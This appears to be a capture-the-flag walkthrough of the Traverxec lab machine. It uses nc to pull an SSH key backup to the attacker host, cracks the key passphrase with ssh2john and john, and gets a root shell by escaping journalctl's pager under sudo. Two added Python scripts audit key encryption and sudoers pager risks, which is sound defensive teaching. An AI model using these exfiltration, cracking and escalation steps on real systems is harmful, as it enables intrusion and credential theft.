Traverxec (ssh2john: cracking the passphrase of id_rsa)

Have the target machine connect back to kali: succeeds
kali: nc -lnvp 8888 > backup-ssh-identity-files.tgz
target: nc 10.10.14.8 8888 -w 10 < backup-ssh-identity-files.tgz

Extract it
gunzip backup-ssh-identity-files.tgz
After extraction, the /home/david directory contains authorized_keys, id_rsa and id_rsa.pub

Password cracking

john --wordlist=rockyou.txt whatpass.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (?)
1g 0:00:04:04 DONE (2019-12-30 15:08) 0.004088g/s 43248p/s 43248c/s 43248C/s Noxema..Nowhere
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The hash format is md5crypt-long. Trying to switch user with the cracked password fails:
su david / Nowonly4me

su root / Nowonly4me
fails

SSH login

ssh david@10.10.10.165 -i id_rsa
Entering the password Nowonly4me fails

locate ssh2john
cd /usr/share/john
python ssh2john.py

Running it prints the usage

python ssh2john.py /root/Documents/target/165/home/david/.ssh/id_rsa > /tmp/out.txt

cat /tmp/out.txt

john /tmp/out.txt --wordlist=/usr/share/wordlists/rockyou.txt

This gives the passphrase for id_rsa
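The reason a passphrase on an id_rsa like this one falls to a wordlist in seconds is the key container, not john: the legacy PEM format ("-----BEGIN RSA PRIVATE KEY-----" with Proc-Type/DEK-Info headers) derives its encryption key from the passphrase with a single MD5 pass (OpenSSL's EVP_BytesToKey), so every guess costs one hash. The newer "openssh-key-v1" container uses a bcrypt KDF with a configurable round count, which makes the same attack orders of magnitude slower. The following script is an added defender-side check and is not part of the original writeup: it reads only the container header of a private key file and reports whether it is unprotected, weakly protected (legacy), or bcrypt-protected (and with how many rounds). The sample keys are constructed headers, not real key material; the OpenSSH sample omits the public/private sections because the inspector never reads them.

```python
import base64
import re
import struct

# Magic bytes that open the binary payload of the openssh-key-v1 container.
OPENSSH_MAGIC = b"openssh-key-v1\x00"
OPENSSH_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
LEGACY_BEGIN_RE = re.compile(r"^-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----$")
UNPROTECTED = "unprotected: no passphrase, possession of the file alone grants access"


def _ssh_string(buf, off):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(text):
    """Return the container format, whether it is encrypted, the KDF and a verdict."""
    lines = [ln.strip() for ln in text.strip().splitlines()]

    if lines[0] == OPENSSH_BEGIN:
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 payload")
        off = len(OPENSSH_MAGIC)
        cipher, off = _ssh_string(blob, off)      # "none" when no passphrase is set
        kdf, off = _ssh_string(blob, off)         # "bcrypt" or "none"
        kdfopts, off = _ssh_string(blob, off)     # bcrypt: string salt || uint32 rounds
        cipher, kdf = cipher.decode(), kdf.decode()
        rounds = None
        if kdf == "bcrypt":
            _salt, o = _ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        if cipher == "none":
            verdict = UNPROTECTED
        else:
            verdict = f"protected: {kdf} KDF with {rounds} rounds, each guess is expensive"
        return {"format": "openssh-key-v1", "encrypted": cipher != "none",
                "kdf": kdf, "rounds": rounds, "verdict": verdict}

    if LEGACY_BEGIN_RE.match(lines[0]):
        headers = {}
        for ln in lines[1:]:          # header block ends at the first blank/base64 line
            if ":" not in ln:
                break
            k, v = ln.split(":", 1)
            headers[k.strip()] = v.strip()
        encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
        if encrypted:
            verdict = ("weak: legacy PEM derives the key with one MD5 pass (EVP_BytesToKey), "
                       "so a wordlist attack is cheap; re-encrypt with: "
                       "ssh-keygen -p -o -a 100 -f <keyfile>")
        else:
            verdict = UNPROTECTED
        return {"format": "legacy-pem", "encrypted": encrypted,
                "kdf": "md5-1-round" if encrypted else None,
                "rounds": 1 if encrypted else None, "verdict": verdict}

    raise ValueError(f"unrecognised key header: {lines[0]!r}")


def build_openssh_sample(cipher, kdf, rounds=100):
    """Constructed sample: only the header fields inspect_private_key reads; not a usable key."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = OPENSSH_MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(kdfopts)
    b64 = base64.b64encode(blob).decode()
    return f"{OPENSSH_BEGIN}\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed sample of the legacy container; the body line is filler, not key material.
LEGACY_ENCRYPTED_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for label, key in [("legacy, encrypted", LEGACY_ENCRYPTED_SAMPLE),
                       ("openssh, bcrypt", build_openssh_sample("aes256-ctr", "bcrypt")),
                       ("openssh, no passphrase", build_openssh_sample("none", "none"))]:
        print(f"{label}: {inspect_private_key(key)['verdict']}")
```

Run it against the id_rsa files in a backup or a user's ~/.ssh and anything reported as "legacy" or "unprotected" is the finding; the fix is the ssh-keygen -p -o -a 100 conversion the verdict names (modern ssh-keygen writes the bcrypt container by default, so only old keys need it).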

Privilege escalation

Reference: https://gtfobins.github.io/gtfobins/journalctl/

journalctl queries the logs collected by the systemd-journald service.
Try the SSH login again with ssh david@10.10.10.165 -i id_rsa, enter the passphrase, and the login succeeds.

cd /home/david/bin; ls
cat *.conf
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/bash    (typed at the prompt of the pager that journalctl opens; see the GTFOBins reference above)
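What makes this sudo rule dangerous is not journalctl itself but the pager it hands output to when stdout is a terminal: the pager runs as root and can spawn commands. Two sudoers-level mitigations close it: the NOEXEC tag, which stops the command from exec'ing anything (the pager included), or pinning the argument list to include --no-pager so the pager is never started. The script below is an added defender-side audit, not part of the original writeup: it parses a subset of sudoers grammar (user host=(runas) TAG: command args), flags rules that run a pager-invoking systemd tool without either mitigation, and proposes the fix. The PAGER_COMMANDS set is an assumption limited to the two systemd tools that honour --no-pager and $SYSTEMD_PAGER; the sudoers fragment is a constructed sample whose david line mirrors the command seen on the box.

```python
import re
import shlex

# Subset of sudoers grammar: user host=(runas) TAG: TAG: command args, command args
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# systemd tools that pipe output to $SYSTEMD_PAGER/$PAGER (less by default) on a tty.
# Assumption for this audit: these are the only pager-invoking commands it knows about.
PAGER_COMMANDS = {"journalctl", "systemctl"}


def parse_rule(line):
    """Split one sudoers rule into user, run-as target, tag set and command list."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return {"user": m.group("user"), "runas": m.group("runas") or "root",
            "tags": tags, "cmds": cmds}


def audit_sudoers(text):
    """Return findings for rules whose command can drop into a root-owned pager."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        rule = parse_rule(line)
        if rule is None:
            continue
        for cmd in rule["cmds"]:
            argv = shlex.split(cmd)
            name = argv[0].rsplit("/", 1)[-1]
            if name not in PAGER_COMMANDS:
                continue
            # NOEXEC: the tool cannot exec a pager at all.
            # --no-pager pinned in the rule: sudo requires the exact argument list, so
            # the user cannot drop the flag and get the pager back.
            if "NOEXEC" in rule["tags"] or "--no-pager" in argv[1:]:
                continue
            findings.append({
                "line": lineno,
                "user": rule["user"],
                "runas": rule["runas"],
                "command": cmd,
                "issue": f"{name} runs as {rule['runas']} and opens an interactive pager",
                "fix": (f"add NOEXEC: to the rule, or pin the arguments to "
                        f"'{argv[0]} --no-pager {' '.join(argv[1:])}'"),
            })
    return findings


# Constructed sample fragment, not a real /etc/sudoers.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops   ALL=(root) NOPASSWD: NOEXEC: /usr/bin/journalctl -u nginx
audit ALL=(root) /usr/bin/journalctl --no-pager -u sshd
root  ALL=(ALL:ALL) ALL
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['user']} -> {f['command']}")
        print(f"  issue: {f['issue']}")
        print(f"  fix:   {f['fix']}")
```

Only the david rule is reported: the ops rule carries NOEXEC and the audit rule pins --no-pager. Feed the script the output of visudo -c -f or the files under /etc/sudoers.d to review a real host.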

Summary

Two things learned this time:

  1. locate ssh2john
python ssh2john.py id_rsa > out.txt
john out.txt --wordlist=<wordlist>

With the id_rsa private key in hand, its passphrase can be brute-forced.

  2. Privilege escalation through binaries listed on GTFOBins; a separate post will cover it.